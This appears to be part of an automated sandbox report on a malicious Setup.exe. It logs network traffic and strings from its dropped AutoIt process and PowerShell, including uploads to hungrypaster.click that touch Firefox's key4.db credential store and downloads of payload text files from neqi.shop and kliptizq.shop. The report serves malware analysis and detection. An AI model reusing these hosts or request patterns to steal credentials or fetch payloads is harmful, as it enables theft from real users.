Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: hungrypaster.click
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 77 | Host: hungrypaster.click
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=TIISHQNJAG16259AJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18155 | Host: hungrypaster.click
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=QYR7YRM38GD4I3YU5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8776 | Host: hungrypaster.click
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=MFV3S0UO4HZA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20399 | Host: hungrypaster.click
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=BDDN9MUY | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1193 | Host: hungrypaster.click
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=IV5EB92934TXGICS6X | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1123 | Host: hungrypaster.click
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 112 | Host: hungrypaster.click
Source: global traffic; HTTP traffic detected: GET /sdgjyut/psh.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: neqi.shop
Source: global traffic; HTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: kliptizq.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002DD889 InternetReadFile,SetEvent,GetLastError,SetEvent,11_2_002DD889
            Source: global trafficHTTP traffic detected: GET /sdgjyut/psh.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: neqi.shop
            Source: global trafficHTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
            Source: global trafficDNS traffic detected: DNS query: PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSA
            Source: global trafficDNS traffic detected: DNS query: hungrypaster.click
            Source: global trafficDNS traffic detected: DNS query: neqi.shop
            Source: global trafficDNS traffic detected: DNS query: kliptizq.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hungrypaster.click
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 24 Dec 2024 00:34:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vwFdg4fgzq3zjggU7TCdcN%2BhanT5h9f%2FMI0NiQkIvLm%2FKI5zDYk5X4Y6kZdxLrj57n8WVjGPgcVFzWJ5XJLfT6qB0O7W%2B0MhuyL20q%2BT7asSbDUVc4zvtUhZ%2FmvZS53p"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f6c8140d9e27288-EWR
            Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: Setup.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
            Source: powershell.exe, 00000012.00000002.2255979594.0000000007896000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microb
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: Setup.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
            Source: Setup.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: Setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0A
            Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0C
            Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0X
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
            Source: Setup.exeString found in binary or memory: http://ocsps.ssl.com0
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000010.00000002.2334301446.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2254156807.0000000005141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Hc.com, 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp, Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Developers.8.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
            Source: Setup.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Hc.com, 0000000B.00000003.2089519019.0000000004479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000010.00000002.2334301446.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2254156807.0000000005141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBdq
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: powershell.exe, 00000010.00000002.2334301446.000000000593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2334301446.0000000005957000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelphZ
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: Hc.com, 0000000B.00000003.2067214936.00000000043A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click/
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click/api
            Source: Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click:443/api
            Source: Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click:443/api.default-release/key4.dbPK
            Source: Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click:443/api3r78r106r115r115r112r115r43r69r106r103r103r102r115r102r111r100r102
            Source: Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hungrypaster.click:443/apitPK
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/(W#
            Source: Hc.com, 0000000B.00000002.2324271859.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp, Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txt
            Source: Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop:443/int_clp_ldr_sha.txt
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/BJ
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txt
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txtk
            Source: Hc.com, 0000000B.00000002.2324147573.00000000019D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txto
            Source: Hc.com, 0000000B.00000002.2324057509.0000000001873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop:443/sdgjyut/psh.txt
            Source: powershell.exe, 00000010.00000002.2338815956.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Hc.com, 0000000B.00000003.2044510092.00000000044A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Hc.com, 0000000B.00000003.2066793875.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044585816.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044510092.00000000044A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: Hc.com, 0000000B.00000003.2044585816.000000000447B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: Hc.com, 0000000B.00000003.2066793875.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044585816.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044510092.00000000044A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: Hc.com, 0000000B.00000003.2044585816.000000000447B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004817000.00000004.00000800.00020000.00000000.sdmp, Hc.com.1.dr, Fw.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: powershell.exe, 00000012.00000002.2254156807.00000000053F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253165533.00000000030A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
            Source: powershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landinghZ
            Source: powershell.exe, 00000012.00000002.2253287573.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253980772.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253484959.0000000003337000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253787168.0000000003510000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blank
            Source: powershell.exe, 00000012.00000002.2253287573.000000000327F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingmanceY
            Source: powershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phish
            Source: powershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishhZ
            Source: powershell.exe, 00000012.00000002.2254156807.00000000054F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-atX)
            Source: powershell.exe, 00000012.00000002.2254156807.00000000053F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253165533.00000000030A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
            Source: powershell.exe, 00000012.00000002.2253287573.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253980772.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253484959.0000000003337000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253787168.0000000003510000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2253287573.000000000324C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-c
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Fw.8.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: Hc.com, 0000000B.00000003.2044585816.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043897088.000000000447A000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044209015.0000000004464000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2043959982.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000003.2044421982.0000000004464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Hc.com, 0000000B.00000003.2090598072.0000000005C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: Setup.exeString found in binary or memory: https://www.ssl.com/repository0
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49744 version: TLS 1.2
